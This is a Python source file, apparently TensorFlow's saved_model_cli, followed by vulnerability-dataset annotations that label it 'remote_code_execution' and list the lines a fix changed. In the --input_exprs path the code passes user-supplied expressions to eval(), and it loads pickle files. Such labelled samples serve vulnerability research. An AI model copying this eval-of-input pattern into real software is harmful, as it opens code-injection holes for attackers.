with ops_lib.Graph().as_default():
trackable_object = load.load(saved_model_dir)
print('\nDefined Functions:', end='')
functions = (
save._AugmentedGraphView(trackable_object) # pylint: disable=protected-access
.list_functions(trackable_object))
functions = sorted(functions.items(), key=lambda x: x[0])
for name, function in functions:
print('\n Function Name: \'%s\'' % name)
concrete_functions = []
if isinstance(function, defun.ConcreteFunction):
concrete_functions.append(function)
if isinstance(function, def_function.Function):
concrete_functions.extend(
function._list_all_concrete_functions_for_serialization()) # pylint: disable=protected-access
concrete_functions = sorted(concrete_functions, key=lambda x: x.name)
for index, concrete_function in enumerate(concrete_functions, 1):
args, kwargs = None, None
if concrete_function.structured_input_signature:
args, kwargs = concrete_function.structured_input_signature
elif concrete_function._arg_keywords: # pylint: disable=protected-access
# For pure ConcreteFunctions we might have nothing better than
# _arg_keywords.
args = concrete_function._arg_keywords # pylint: disable=protected-access
if args:
print(' Option #%d' % index)
print(' Callable with:')
_print_args(args, indent=4)
if kwargs:
_print_args(kwargs, 'Named Argument', indent=4)
def _print_args(arguments, argument_type='Argument', indent=0):
"""Formats and prints the argument of the concrete functions defined in the model.
Args:
arguments: Arguments to format print.
argument_type: Type of arguments.
indent: How far (in increments of 2 spaces) to indent each line of
output.
"""
indent_str = ' ' * indent
def _maybe_add_quotes(value):
is_quotes = '\'' * isinstance(value, str)
return is_quotes + str(value) + is_quotes
def in_print(s, end='\n'):
print(indent_str + s, end=end)
for index, element in enumerate(arguments, 1):
if indent == 4:
in_print('%s #%d' % (argument_type, index))
if isinstance(element, six.string_types):
in_print(' %s' % element)
elif isinstance(element, tensor_spec.TensorSpec):
print((indent + 1) * ' ' + '%s: %s' % (element.name, repr(element)))
elif (isinstance(element, collections_abc.Iterable) and
not isinstance(element, dict)):
in_print(' DType: %s' % type(element).__name__)
in_print(' Value: [', end='')
for value in element:
print('%s' % _maybe_add_quotes(value), end=', ')
print('\b\b]')
elif isinstance(element, dict):
in_print(' DType: %s' % type(element).__name__)
in_print(' Value: {', end='')
for (key, value) in element.items():
print('\'%s\': %s' % (str(key), _maybe_add_quotes(value)), end=', ')
print('\b\b}')
else:
in_print(' DType: %s' % type(element).__name__)
in_print(' Value: %s' % str(element))
def _print_tensor_info(tensor_info, indent=0):
"""Prints details of the given tensor_info.
Args:
tensor_info: TensorInfo object to be printed.
indent: How far (in increments of 2 spaces) to indent each line output
"""
indent_str = ' ' * indent
def in_print(s):
print(indent_str + s)
in_print(' dtype: ' +
{value: key
for (key, value) in types_pb2.DataType.items()}[tensor_info.dtype])
# Display shape as tuple.
if tensor_info.tensor_shape.unknown_rank:
shape = 'unknown_rank'
else:
dims = [str(dim.size) for dim in tensor_info.tensor_shape.dim]
shape = ', '.join(dims)
shape = '(' + shape + ')'
in_print(' shape: ' + shape)
in_print(' name: ' + tensor_info.name)
def _show_all(saved_model_dir):
"""Prints tag-set, SignatureDef and Inputs/Outputs information in SavedModel.
Prints all tag-set, SignatureDef and Inputs/Outputs information stored in
SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
"""
tag_sets = saved_model_utils.get_saved_model_tag_sets(saved_model_dir)
for tag_set in sorted(tag_sets):
print("\nMetaGraphDef with tag-set: '%s' "
"contains the following SignatureDefs:" % ', '.join(tag_set))
tag_set = ','.join(tag_set)
signature_def_map = get_signature_def_map(saved_model_dir, tag_set)
for signature_def_key in sorted(signature_def_map.keys()):
print('\nsignature_def[\'' + signature_def_key + '\']:')
_show_inputs_outputs(saved_model_dir, tag_set, signature_def_key,
indent=1)
_show_defined_functions(saved_model_dir)
def get_meta_graph_def(saved_model_dir, tag_set):
"""DEPRECATED: Use saved_model_utils.get_meta_graph_def instead.
Gets MetaGraphDef from SavedModel. Returns the MetaGraphDef for the given
tag-set and SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect or execute.
tag_set: Group of tag(s) of the MetaGraphDef to load, in string format,
separated by ','. For tag-set contains multiple tags, all tags must be
passed in.
Raises:
RuntimeError: An error when the given tag-set does not exist in the
SavedModel.
Returns:
A MetaGraphDef corresponding to the tag-set.
"""
return saved_model_utils.get_meta_graph_def(saved_model_dir, tag_set)
def get_signature_def_map(saved_model_dir, tag_set):
"""Gets SignatureDef map from a MetaGraphDef in a SavedModel.
Returns the SignatureDef map for the given tag-set in the SavedModel
directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect or execute.
tag_set: Group of tag(s) of the MetaGraphDef with the SignatureDef map, in
string format, separated by ','. For tag-set contains multiple tags, all
tags must be passed in.
Returns:
A SignatureDef map that maps from string keys to SignatureDefs.
"""
meta_graph = saved_model_utils.get_meta_graph_def(saved_model_dir, tag_set)
return meta_graph.signature_def
def scan_meta_graph_def(meta_graph_def):
"""Scans meta_graph_def and reports if there are ops on denylist.
Print ops if they are on black list, or print success if no denylisted ops
found.
Args:
meta_graph_def: MetaGraphDef protocol buffer.
"""
all_ops_set = set(
meta_graph_lib.ops_used_by_graph_def(meta_graph_def.graph_def))
denylisted_ops = _OP_DENYLIST & all_ops_set
if denylisted_ops:
# TODO(yifeif): print more warnings
print(
'MetaGraph with tag set %s contains the following denylisted ops:' %
meta_graph_def.meta_info_def.tags, denylisted_ops)
else:
print('MetaGraph with tag set %s does not contain denylisted ops.' %
meta_graph_def.meta_info_def.tags)
def run_saved_model_with_feed_dict(saved_model_dir, tag_set, signature_def_key,
input_tensor_key_feed_dict, outdir,
overwrite_flag, worker=None, init_tpu=False,
tf_debug=False):
"""Runs SavedModel and fetch all outputs.
Runs the input dictionary through the MetaGraphDef within a SavedModel
specified by the given tag_set and SignatureDef. Also save the outputs to file
if outdir is not None.
Args:
saved_model_dir: Directory containing the SavedModel to execute.
tag_set: Group of tag(s) of the MetaGraphDef with the SignatureDef map, in
string format, separated by ','. For tag-set contains multiple tags, all
tags must be passed in.
signature_def_key: A SignatureDef key string.
input_tensor_key_feed_dict: A dictionary maps input keys to numpy ndarrays.
outdir: A directory to save the outputs to. If the directory doesn't exist,
it will be created.
overwrite_flag: A boolean flag to allow overwrite output file if file with
the same name exists.
worker: If provided, the session will be run on the worker. Valid worker
specification is a bns or gRPC path.
init_tpu: If true, the TPU system will be initialized after the session
is created.
tf_debug: A boolean flag to use TensorFlow Debugger (TFDBG) to observe the
intermediate Tensor values and runtime GraphDefs while running the
SavedModel.
Raises:
ValueError: When any of the input tensor keys is not valid.
RuntimeError: An error when output file already exists and overwrite is not
enabled.
"""
# Get a list of output tensor names.
meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
tag_set)
# Re-create feed_dict based on input tensor name instead of key as session.run
# uses tensor name.
inputs_tensor_info = _get_inputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
# Check if input tensor keys are valid.
for input_key_name in input_tensor_key_feed_dict.keys():
if input_key_name not in inputs_tensor_info:
raise ValueError(
'"%s" is not a valid input key. Please choose from %s, or use '
'--show option.' %
(input_key_name, '"' + '", "'.join(inputs_tensor_info.keys()) + '"'))
inputs_feed_dict = {
inputs_tensor_info[key].name: tensor
for key, tensor in input_tensor_key_feed_dict.items()
}
# Get outputs
outputs_tensor_info = _get_outputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
# Sort to preserve order because we need to go from value to key later.
output_tensor_keys_sorted = sorted(outputs_tensor_info.keys())
output_tensor_names_sorted = [
outputs_tensor_info[tensor_key].name
for tensor_key in output_tensor_keys_sorted
]
with session.Session(worker, graph=ops_lib.Graph()) as sess:
if init_tpu:
print('Initializing TPU System ...')
# This is needed for freshly started worker, or if the job
# restarts after a preemption.
sess.run(tpu.initialize_system())
loader.load(sess, tag_set.split(','), saved_model_dir)
if tf_debug:
sess = local_cli_wrapper.LocalCLIDebugWrapperSession(sess)
outputs = sess.run(output_tensor_names_sorted, feed_dict=inputs_feed_dict)
for i, output in enumerate(outputs):
output_tensor_key = output_tensor_keys_sorted[i]
print('Result for output key %s:\n%s' % (output_tensor_key, output))
# Only save if outdir is specified.
if outdir:
# Create directory if outdir does not exist
if not os.path.isdir(outdir):
os.makedirs(outdir)
output_full_path = os.path.join(outdir, output_tensor_key + '.npy')
# If overwrite not enabled and file already exist, error out
if not overwrite_flag and os.path.exists(output_full_path):
raise RuntimeError(
'Output file %s already exists. Add \"--overwrite\" to overwrite'
' the existing output files.' % output_full_path)
np.save(output_full_path, output)
print('Output %s is saved to %s' % (output_tensor_key,
output_full_path))
def preprocess_inputs_arg_string(inputs_str):
"""Parses input arg into dictionary that maps input to file/variable tuple.
Parses input string in the format of, for example,
"input1=filename1[variable_name1],input2=filename2" into a
dictionary looks like
{'input_key1': (filename1, variable_name1),
'input_key2': (file2, None)}
, which maps input keys to a tuple of file name and variable name(None if
empty).
Args:
inputs_str: A string that specified where to load inputs. Inputs are
separated by semicolons.
* For each input key:
'<input_key>=<filename>' or
'<input_key>=<filename>[<variable_name>]'
* The optional 'variable_name' key will be set to None if not specified.
Returns:
A dictionary that maps input keys to a tuple of file name and variable name.
Raises:
RuntimeError: An error when the given input string is in a bad format.
"""
input_dict = {}
inputs_raw = inputs_str.split(';')
for input_raw in filter(bool, inputs_raw): # skip empty strings
# Format of input=filename[variable_name]'
match = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', input_raw)
if match:
input_dict[match.group(1)] = match.group(2), match.group(3)
else:
# Format of input=filename'
match = re.match(r'([^=]+)=([^\[\]]+)$', input_raw)
if match:
input_dict[match.group(1)] = match.group(2), None
else:
raise RuntimeError(
'--inputs "%s" format is incorrect. Please follow'
'"<input_key>=<filename>", or'
'"<input_key>=<filename>[<variable_name>]"' % input_raw)
return input_dict
def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):
"""Parses input arg into dictionary that maps input key to python expression.
Parses input string in the format of 'input_key=<python expression>' into a
dictionary that maps each input_key to its python expression.
Args:
input_exprs_str: A string that specifies python expression for input keys.
Each input is separated by semicolon. For each input key:
'input_key=<python expression>'
safe: Whether to evaluate the python expression as literals or allow
arbitrary calls (e.g. numpy usage).
Returns:
A dictionary that maps input keys to their values.
Raises:
RuntimeError: An error when the given input string is in a bad format.
"""
input_dict = {}
for input_raw in filter(bool, input_exprs_str.split(';')):
if '=' not in input_exprs_str:
raise RuntimeError('--input_exprs "%s" format is incorrect. Please follow'
'"<input_key>=<python expression>"' % input_exprs_str)
input_key, expr = input_raw.split('=', 1)
if safe:
try:
input_dict[input_key] = ast.literal_eval(expr)
except:
raise RuntimeError(
f'Expression "{expr}" is not a valid python literal.')
else:
# ast.literal_eval does not work with numpy expressions
input_dict[input_key] = eval(expr) # pylint: disable=eval-used
return input_dict
def preprocess_input_examples_arg_string(input_examples_str):
"""Parses input into dict that maps input keys to lists of tf.Example.
Parses input string in the format of 'input_key1=[{feature_name:
feature_list}];input_key2=[{feature_name:feature_list}];' into a dictionary
that maps each input_key to its list of serialized tf.Example.
Args:
input_examples_str: A string that specifies a list of dictionaries of
feature_names and their feature_lists for each input.
Each input is separated by semicolon. For each input key:
'input=[{feature_name1: feature_list1, feature_name2:feature_list2}]'
items in feature_list can be the type of float, int, long or str.
Returns:
A dictionary that maps input keys to lists of serialized tf.Example.
Raises:
ValueError: An error when the given tf.Example is not a list.
"""
input_dict = preprocess_input_exprs_arg_string(input_examples_str)
for input_key, example_list in input_dict.items():
if not isinstance(example_list, list):
raise ValueError(
'tf.Example input must be a list of dictionaries, but "%s" is %s' %
(example_list, type(example_list)))
input_dict[input_key] = [
_create_example_string(example) for example in example_list
]
return input_dict
def _create_example_string(example_dict):
"""Create a serialized tf.example from feature dictionary."""
example = example_pb2.Example()
for feature_name, feature_list in example_dict.items():
if not isinstance(feature_list, list):
raise ValueError('feature value must be a list, but %s: "%s" is %s' %
(feature_name, feature_list, type(feature_list)))
if isinstance(feature_list[0], float):
example.features.feature[feature_name].float_list.value.extend(
feature_list)
elif isinstance(feature_list[0], str):
example.features.feature[feature_name].bytes_list.value.extend(
[f.encode('utf8') for f in feature_list])
elif isinstance(feature_list[0], bytes):
example.features.feature[feature_name].bytes_list.value.extend(
feature_list)
elif isinstance(feature_list[0], six.integer_types):
example.features.feature[feature_name].int64_list.value.extend(
feature_list)
else:
raise ValueError(
'Type %s for value %s is not supported for tf.train.Feature.' %
(type(feature_list[0]), feature_list[0]))
return example.SerializeToString()
def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,
input_examples_str):
"""Parses input arg strings and create inputs feed_dict.
Parses '--inputs' string for inputs to be loaded from file, and parses
'--input_exprs' string for inputs to be evaluated from python expression.
'--input_examples' string for inputs to be created from tf.example feature
dictionary list.
Args:
inputs_str: A string that specified where to load inputs. Each input is
separated by semicolon.
* For each input key:
'<input_key>=<filename>' or
'<input_key>=<filename>[<variable_name>]'
* The optional 'variable_name' key will be set to None if not specified.
* File specified by 'filename' will be loaded using numpy.load. Inputs
can be loaded from only .npy, .npz or pickle files.
* The "[variable_name]" key is optional depending on the input file type
as descripted in more details below.
When loading from a npy file, which always contains a numpy ndarray, the
content will be directly assigned to the specified input tensor. If a
variable_name is specified, it will be ignored and a warning will be
issued.
When loading from a npz zip file, user can specify which variable within
the zip file to load for the input tensor inside the square brackets. If
nothing is specified, this function will check that only one file is
included in the zip and load it for the specified input tensor.
When loading from a pickle file, if no variable_name is specified in the
square brackets, whatever that is inside the pickle file will be passed
to the specified input tensor, else SavedModel CLI will assume a
dictionary is stored in the pickle file and the value corresponding to
the variable_name will be used.
input_exprs_str: A string that specifies python expressions for inputs.
* In the format of: '<input_key>=<python expression>'.
* numpy module is available as np.
input_examples_str: A string that specifies tf.Example with dictionary.
* In the format of: '<input_key>=<[{feature:value list}]>'
Returns:
A dictionary that maps input tensor keys to numpy ndarrays.
Raises:
RuntimeError: An error when a key is specified, but the input file contains
multiple numpy ndarrays, none of which matches the given key.
RuntimeError: An error when no key is specified, but the input file contains
more than one numpy ndarrays.
"""
tensor_key_feed_dict = {}
inputs = preprocess_inputs_arg_string(inputs_str)
input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)
input_examples = preprocess_input_examples_arg_string(input_examples_str)
for input_tensor_key, (filename, variable_name) in inputs.items():
data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg
# When a variable_name key is specified for the input file
if variable_name:
# if file contains a single ndarray, ignore the input name
if isinstance(data, np.ndarray):
logging.warn(
'Input file %s contains a single ndarray. Name key \"%s\" ignored.'
% (filename, variable_name))
tensor_key_feed_dict[input_tensor_key] = data
else:
if variable_name in data:
tensor_key_feed_dict[input_tensor_key] = data[variable_name]
else:
raise RuntimeError(
'Input file %s does not contain variable with name \"%s\".' %
(filename, variable_name))
# When no key is specified for the input file.
else:
# Check if npz file only contains a single numpy ndarray.
if isinstance(data, np.lib.npyio.NpzFile):
variable_name_list = data.files
if len(variable_name_list) != 1:
raise RuntimeError(
'Input file %s contains more than one ndarrays. Please specify '
'the name of ndarray to use.' % filename)
tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]
else:
tensor_key_feed_dict[input_tensor_key] = data
# When input is a python expression:
for input_tensor_key, py_expr_evaluated in input_exprs.items():
if input_tensor_key in tensor_key_feed_dict:
logging.warn(
'input_key %s has been specified with both --inputs and --input_exprs'
' options. Value in --input_exprs will be used.' % input_tensor_key)
tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated
# When input is a tf.Example:
for input_tensor_key, example in input_examples.items():
if input_tensor_key in tensor_key_feed_dict:
logging.warn(
'input_key %s has been specified in multiple options. Value in '
'--input_examples will be used.' % input_tensor_key)
tensor_key_feed_dict[input_tensor_key] = example
return tensor_key_feed_dict
def show(args):
"""Function triggered by show command.
Args:
args: A namespace parsed from command line.
"""
# If all tag is specified, display all information.
if args.all:
_show_all(args.dir)
else:
# If no tag is specified, display all tag_set, if no signature_def key is
# specified, display all SignatureDef keys, else show input output tensor
# information corresponding to the given SignatureDef key
if args.tag_set is None:
_show_tag_sets(args.dir)
else:
if args.signature_def is None:
_show_signature_def_map_keys(args.dir, args.tag_set)
else:
_show_inputs_outputs(args.dir, args.tag_set, args.signature_def)
def run(args):
"""Function triggered by run command.
Args:
args: A namespace parsed from command line.
Raises:
AttributeError: An error when neither --inputs nor --input_exprs is passed
to run command.
"""
if not args.inputs and not args.input_exprs and not args.input_examples:
raise AttributeError(
'At least one of --inputs, --input_exprs or --input_examples must be '
'required')
tensor_key_feed_dict = load_inputs_from_input_arg_string(
args.inputs, args.input_exprs, args.input_examples)
run_saved_model_with_feed_dict(args.dir, args.tag_set, args.signature_def,
tensor_key_feed_dict, args.outdir,
args.overwrite, worker=args.worker,
init_tpu=args.init_tpu, tf_debug=args.tf_debug)
def scan(args):
"""Function triggered by scan command.
Args:
args: A namespace parsed from command line.
"""
if args.tag_set:
scan_meta_graph_def(
saved_model_utils.get_meta_graph_def(args.dir, args.tag_set))
else:
saved_model = saved_model_utils.read_saved_model(args.dir)
for meta_graph_def in saved_model.meta_graphs:
scan_meta_graph_def(meta_graph_def)
def convert_with_tensorrt(args):
"""Function triggered by 'convert tensorrt' command.
Args:
args: A namespace parsed from command line.
"""
# Import here instead of at top, because this will crash if TensorRT is
# not installed
from tensorflow.python.compiler.tensorrt import trt_convert as trt # pylint: disable=g-import-not-at-top
if not args.convert_tf1_model:
params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
max_workspace_size_bytes=args.max_workspace_size_bytes,
precision_mode=args.precision_mode,
minimum_segment_size=args.minimum_segment_size)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=args.dir,
input_saved_model_tags=args.tag_set.split(','),
conversion_params=params)
try:
converter.convert()
except Exception as e:
raise RuntimeError(
'{}. Try passing "--convert_tf1_model=True".'.format(e))
converter.save(output_saved_model_dir=args.output_dir)
else:
trt.create_inference_graph(
None,
None,
max_batch_size=1,
max_workspace_size_bytes=args.max_workspace_size_bytes,
precision_mode=args.precision_mode,
minimum_segment_size=args.minimum_segment_size,
is_dynamic_op=True,
input_saved_model_dir=args.dir,
input_saved_model_tags=args.tag_set.split(','),
output_saved_model_dir=args.output_dir)
def aot_compile_cpu(args):
"""Function triggered by aot_compile_cpu command.
Args:
args: A namespace parsed from command line.
"""
checkpoint_path = (
args.checkpoint_path
or os.path.join(args.dir, 'variables/variables'))
if not args.variables_to_feed:
variables_to_feed = []
elif args.variables_to_feed.lower() == 'all':
variables_to_feed = None # We will identify them after.
else:
variables_to_feed = args.variables_to_feed.split(',')
saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
checkpoint_path=checkpoint_path,
meta_graph_def=saved_model_utils.get_meta_graph_def(
args.dir, args.tag_set),
signature_def_key=args.signature_def_key,
variables_to_feed=variables_to_feed,
output_prefix=args.output_prefix,
target_triple=args.target_triple,
target_cpu=args.target_cpu,
cpp_class=args.cpp_class,
multithreading=args.multithreading.lower() not in ('f', 'false', '0'))
def add_show_subparser(subparsers):
"""Add parser for `show`."""
show_msg = (
'Usage examples:\n'
'To show all tag-sets in a SavedModel:\n'
'$saved_model_cli show --dir /tmp/saved_model\n\n'
'To show all available SignatureDef keys in a '
'MetaGraphDef specified by its tag-set:\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve\n\n'
'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
'passed in, separated by \';\':\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve,gpu\n\n'
'To show all inputs and outputs TensorInfo for a specific'
' SignatureDef specified by the SignatureDef key in a'
' MetaGraph.\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve'
' --signature_def serving_default\n\n'
'To show all available information in the SavedModel:\n'
'$saved_model_cli show --dir /tmp/saved_model --all')
parser_show = subparsers.add_parser(
'show',
description=show_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_show.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to inspect')
parser_show.add_argument(
'--all',
action='store_true',
help='if set, will output all information in given SavedModel')
parser_show.add_argument(
'--tag_set',
type=str,
default=None,
help='tag-set of graph in SavedModel to show, separated by \',\'')
parser_show.add_argument(
'--signature_def',
type=str,
default=None,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to display input(s) and output(s) for')
parser_show.set_defaults(func=show)
def add_run_subparser(subparsers):
"""Add parser for `run`."""
run_msg = ('Usage example:\n'
'To run input tensors from files through a MetaGraphDef and save'
' the output tensors to files:\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve \\\n'
' --signature_def serving_default \\\n'
' --inputs input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
'\\\n'
' --input_exprs \'input3_key=np.ones(2)\' \\\n'
' --input_examples '
'\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
' --outdir=/out\n\n'
'For more information about input file format, please see:\n'
'https://www.tensorflow.org/guide/saved_model_cli\n')
parser_run = subparsers.add_parser(
'run', description=run_msg, formatter_class=argparse.RawTextHelpFormatter)
parser_run.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
parser_run.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to load, separated by \',\'')
parser_run.add_argument(
'--signature_def',
type=str,
required=True,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to run')
msg = ('Loading inputs from files, in the format of \'<input_key>=<filename>,'
' or \'<input_key>=<filename>[<variable_name>]\', separated by \';\'.'
' The file format can only be from .npy, .npz or pickle.')
parser_run.add_argument('--inputs', type=str, default='', help=msg)
msg = ('Specifying inputs by python expressions, in the format of'
' "<input_key>=\'<python expression>\'", separated by \';\'. '
'numpy module is available as \'np\'. Please note that the expression '
'will be evaluated as-is, and is susceptible to code injection. '
'When this is set, the value will override duplicate input keys from '
'--inputs option.')
parser_run.add_argument('--input_exprs', type=str, default='', help=msg)
msg = (
'Specifying tf.Example inputs as list of dictionaries. For example: '
'<input_key>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
'separate input keys. Will override duplicate input keys from --inputs '
'and --input_exprs option.')
parser_run.add_argument('--input_examples', type=str, default='', help=msg)
parser_run.add_argument(
'--outdir',
type=str,
default=None,
help='if specified, output tensor(s) will be saved to given directory')
parser_run.add_argument(
'--overwrite',
action='store_true',
help='if set, output file will be overwritten if it already exists.')
parser_run.add_argument(
'--tf_debug',
action='store_true',
help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
'intermediate Tensors and runtime GraphDefs while running the '
'SavedModel.')
parser_run.add_argument(
'--worker',
type=str,
default=None,
help='if specified, a Session will be run on the worker. '
'Valid worker specification is a bns or gRPC path.')
parser_run.add_argument(
'--init_tpu',
action='store_true',
default=None,
help='if specified, tpu.initialize_system will be called on the Session. '
'This option should be only used if the worker is a TPU job.')
parser_run.set_defaults(func=run)
def add_scan_subparser(subparsers):
"""Add parser for `scan`."""
scan_msg = ('Usage example:\n'
'To scan for denylisted ops in SavedModel:\n'
'$saved_model_cli scan --dir /tmp/saved_model\n'
'To scan a specific MetaGraph, pass in --tag_set\n')
parser_scan = subparsers.add_parser(
'scan',
description=scan_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_scan.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
parser_scan.add_argument(
'--tag_set',
type=str,
help='tag-set of graph in SavedModel to scan, separated by \',\'')
parser_scan.set_defaults(func=scan)
def add_convert_subparser(subparsers):
"""Add parser for `convert`."""
convert_msg = ('Usage example:\n'
'To convert the SavedModel to one that have TensorRT ops:\n'
'$saved_model_cli convert \\\n'
' --dir /tmp/saved_model \\\n'
' --tag_set serve \\\n'
' --output_dir /tmp/saved_model_trt \\\n'
' tensorrt \n')
parser_convert = subparsers.add_parser(
'convert',
description=convert_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_convert.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
parser_convert.add_argument(
'--output_dir',
type=str,
required=True,
help='output directory for the converted SavedModel')
parser_convert.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
convert_subparsers = parser_convert.add_subparsers(
title='conversion methods',
description='valid conversion methods',
help='the conversion to run with the SavedModel')
parser_convert_with_tensorrt = convert_subparsers.add_parser(
'tensorrt',
description='Convert the SavedModel with Tensorflow-TensorRT integration',
formatter_class=argparse.RawTextHelpFormatter)
parser_convert_with_tensorrt.add_argument(
'--max_workspace_size_bytes',
type=int,
default=2 << 20,
help=('the maximum GPU temporary memory which the TRT engine can use at '
'execution time'))
parser_convert_with_tensorrt.add_argument(
'--precision_mode',
type=str,
default='FP32',
help='one of FP32, FP16 and INT8')
parser_convert_with_tensorrt.add_argument(
'--minimum_segment_size',
type=int,
default=3,
help=('the minimum number of nodes required for a subgraph to be replaced'
'in a TensorRT node'))
parser_convert_with_tensorrt.add_argument(
'--convert_tf1_model',
type=bool,
default=False,
help='support TRT conversion for TF1 models')
parser_convert_with_tensorrt.set_defaults(func=convert_with_tensorrt)
def add_aot_compile_cpu_subparser(subparsers):
"""Add parser for `aot_compile_cpu`."""
compile_msg = '\n'.join(
['Usage example:',
'To compile a SavedModel signature via (CPU) XLA AOT:',
'$saved_model_cli aot_compile_cpu \\',
' --dir /tmp/saved_model \\',
' --tag_set serve \\',
' --output_dir /tmp/saved_model_xla_aot',
'', '',
'Note: Additional XLA compilation options are available by setting the ',
'XLA_FLAGS environment variable. See the XLA debug options flags for ',
'all the options: ',
' {}'.format(_XLA_DEBUG_OPTIONS_URL),
'',
'For example, to disable XLA fast math when compiling:',
'',
'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
'aot_compile_cpu ...',
'',
'Some possibly useful flags:',
' --xla_cpu_enable_fast_math=false',
' --xla_force_host_platform_device_count=<num threads>',
' (useful in conjunction with disabling multi threading)'
])
parser_compile = subparsers.add_parser(
'aot_compile_cpu',
description=compile_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_compile.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
parser_compile.add_argument(
'--output_prefix',
type=str,
required=True,
help=('output directory + filename prefix for the resulting header(s) '
'and object file(s)'))
parser_compile.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
parser_compile.add_argument(
'--signature_def_key',
type=str,
default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
help=('signature_def key to use. '
'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
parser_compile.add_argument(
'--target_triple',
type=str,
default='x86_64-pc-linux',
help=('Target triple for LLVM during AOT compilation. Examples: '
'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
'armv7-none-android. More examples are available in tfcompile.bzl '
'in the tensorflow codebase.'))
parser_compile.add_argument(
'--target_cpu',
type=str,
default='',
help=('Target cpu name for LLVM during AOT compilation. Examples: '
'x86_64, skylake, haswell, westmere, <empty> (unknown). For '
'a complete list of options, run (for x86 targets): '
'`llc -march=x86 -mcpu=help`'))
parser_compile.add_argument(
'--checkpoint_path',
type=str,
default=None,
help='Custom checkpoint to use (default: use the SavedModel variables)')
parser_compile.add_argument(
'--cpp_class',
type=str,
required=True,
help=('The name of the generated C++ class, wrapping the generated '
'function. The syntax of this flag is '
'[[<optional_namespace>::],...]<class_name>. This mirrors the '
'C++ syntax for referring to a class, where multiple namespaces '
'may precede the class name, separated by double-colons. '
'The class will be generated in the given namespace(s), or if no '
'namespaces are given, within the global namespace.'))
parser_compile.add_argument(
'--variables_to_feed',
type=str,
default='',
help=('The names of variables that will be fed into the network. '
'Options are: empty (default; all variables are frozen, none may '
'be fed), \'all\' (all variables may be fed), or a '
'comma-delimited list of names of variables that may be fed. In '
'the last case, the non-fed variables will be frozen in the graph.'
'**NOTE** Any variables passed to `variables_to_feed` *must be set '
'by the user*. These variables will NOT be frozen and their '
'values will be uninitialized in the compiled object '
'(this applies to all input arguments from the signature as '
'well).'))
parser_compile.add_argument(
'--multithreading',
type=str,
default='False',
help=('Enable multithreading in the compiled computation. '
'Note that if using this option, the resulting object files '
'may have external dependencies on multithreading libraries '
'like nsync.'))
parser_compile.set_defaults(func=aot_compile_cpu)
def create_parser():
"""Creates a parser that parse the command line arguments.
Returns:
A namespace parsed from command line arguments.
"""
parser = argparse.ArgumentParser(
description='saved_model_cli: Command-line interface for SavedModel')
parser.add_argument('-v', '--version', action='version', version='0.1.0')
subparsers = parser.add_subparsers(
title='commands', description='valid commands', help='additional help')
# show command
add_show_subparser(subparsers)
# run command
add_run_subparser(subparsers)
# scan command
add_scan_subparser(subparsers)
# tensorrt convert command
add_convert_subparser(subparsers)
# aot_compile_cpu command
add_aot_compile_cpu_subparser(subparsers)
return parser
def main():
logging.set_verbosity(logging.INFO)
parser = create_parser()
args = parser.parse_args()
if not hasattr(args, 'func'):
parser.error('too few arguments')
args.func(args)
if __name__ == '__main__':
sys.exit(main())
| remote_code_execution | {
"code": [
"def preprocess_input_exprs_arg_string(input_exprs_str):",
" input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)",
" 'numpy module is available as \\'np\\'. '",
" 'Will override duplicate input keys from --inputs option.')"
],
"line_no": [
524,
662,
926,
927
]
} | {
"code": [
"import ast",
" Each input is separated by semicolon. For each input key:",
" arbitrary calls (e.g. numpy usage).",
" try:",
" input_dict[input_key] = ast.literal_eval(expr)",
" raise RuntimeError(",
" else:",
" input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)",
" 'numpy module is available as \\'np\\'. Please note that the expression '",
" 'will be evaluated as-is, and is susceptible to code injection. '",
" 'When this is set, the value will override duplicate input keys from '",
" '--inputs option.')"
],
"line_no": [
23,
533,
536,
552,
553,
555,
557,
672,
936,
937,
938,
939
]
} |
